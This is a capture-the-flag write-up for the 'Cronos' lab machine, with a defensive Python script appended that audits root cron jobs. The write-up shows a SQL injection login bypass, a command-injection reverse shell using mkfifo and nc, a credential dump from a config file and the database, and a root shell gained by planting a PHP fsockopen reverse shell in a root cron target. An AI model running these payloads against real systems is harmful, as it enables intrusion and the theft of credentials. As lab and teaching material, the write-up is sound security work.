Cronos
Port Scanning
naabu -host cronos.htb
[INF] Running CONNECT scan with non root privileges
[INF] Found 3 ports on host cronos.htb (10.10.10.13)
cronos.htb:53
cronos.htb:80
cronos.htb:22
Open ports:
port 53 DNS
port 80 HTTP (default Apache page)
port 22 SSH
Checking for DNS Zone Transfer
dig axfr cronos.htb @10.10.10.13
; <<>> DiG 9.18.8-1-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 35 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Fri Aug 25 02:35:57 +08 2023
;; XFR size: 7 records (messages 1, bytes 203)
New subdomain found: admin.cronos.htb. Add it to /etc/hosts (IP address first, then the hostname):
echo "10.10.10.13 admin.cronos.htb" >> /etc/hosts
Foothold
The login page at admin.cronos.htb is vulnerable to SQL injection; this input logs us in:
'OR 1 OR'
After logging in, command execution is found to be possible: appending ; to the input lets a second command run, so entering
8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.27 4567 >/tmp/f
yields a reverse shell.
A config file is present in the current directory:
cat config.php
<?php
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'admin');
define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
define('DB_DATABASE', 'admin');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
Looking for users with a home directory:
cat /etc/passwd | grep home
syslog:x:104:108::/home/syslog:/bin/false
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash
Looking at the database:
mysql -u admin -p admin
select * from users;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+
An SSH attempt as noulis is unsuccessful:
ssh noulis@cronos.htb
The authenticity of host 'cronos.htb (10.10.10.13)' can't be established.
ED25519 key fingerprint is SHA256:0QcWAcBsE48rtLkfUydRF2HmC1YqGFnb3VuTC0hLSK0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cronos.htb' (ED25519) to the list of known hosts.
noulis@cronos.htb's password:
Permission denied, please try again.
noulis@cronos.htb's password:
Priv Esc
Cron jobs are found to run as root:
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
The artisan file is a PHP script owned by www-data, so we have read and write access to it:
-rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 artisan
www-data@cronos:/var/www/laravel$ cat artisan
#!/usr/bin/env php
<?php
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/
Modified version:
<?php
$sock=fsockopen("10.10.14.27",1234);exec("sh <&3 >&3 2>&3");
/*
Open a listener and wait for the connection; the cron job runs the modified file as root and a root shell follows:
nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.13] 54116
ls
root.txt
whoami
root
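As an added, defender-side example that is not part of this writeup: an audit that would have flagged this configuration before it was exploited, a root cron job whose target file is owned by another user (or is group/world-writable). The sample crontab is constructed from the entries shown above, and the stand-in file metadata (uid 33 for www-data) is an assumption; pass a real crontab's text with the default lookup to run it against a live host.

```python
import os
import re
import stat

# Constructed sample, assembled from the /etc/crontab entries shown in the writeup.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""
# Constructed stand-in for os.stat(): path -> (uid, mode); uid 33 = www-data on Debian (assumption).
SAMPLE_FILES = {"/etc/cron.hourly": (0, 0o755), "/var/www/laravel/artisan": (33, 0o755)}
# System crontab format: five time fields, a user field, then the command.
CRON_ENTRY = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def real_lookup(path):
    """Live lookup: (uid, mode) for regular files and directories, None otherwise."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    if not (stat.S_ISREG(st.st_mode) or stat.S_ISDIR(st.st_mode)):
        return None  # skip /dev/null and other special files named in redirections
    return st.st_uid, stat.S_IMODE(st.st_mode)

def find_risky_root_jobs(crontab_text, lookup=real_lookup):
    """(command, path, reason) for each root job touching a file a non-root user could modify."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value environment line
        m = CRON_ENTRY.match(line)
        if not m or m.group("user") != "root":
            continue
        cmd = m.group("cmd")
        for token in cmd.split():
            if not token.startswith("/"):
                continue  # only absolute paths are checked
            info = lookup(token)
            if info is None:
                continue  # not a regular file or directory (or does not exist)
            uid, mode = info
            if uid != 0:
                findings.append((cmd, token, f"owned by uid {uid}, not root"))
            elif mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((cmd, token, "group- or world-writable"))
    return findings
```

Run against the sample it reports only /var/www/laravel/artisan, the file the writeup overwrote; /etc/cron.hourly is root-owned and not writable by others, so it passes.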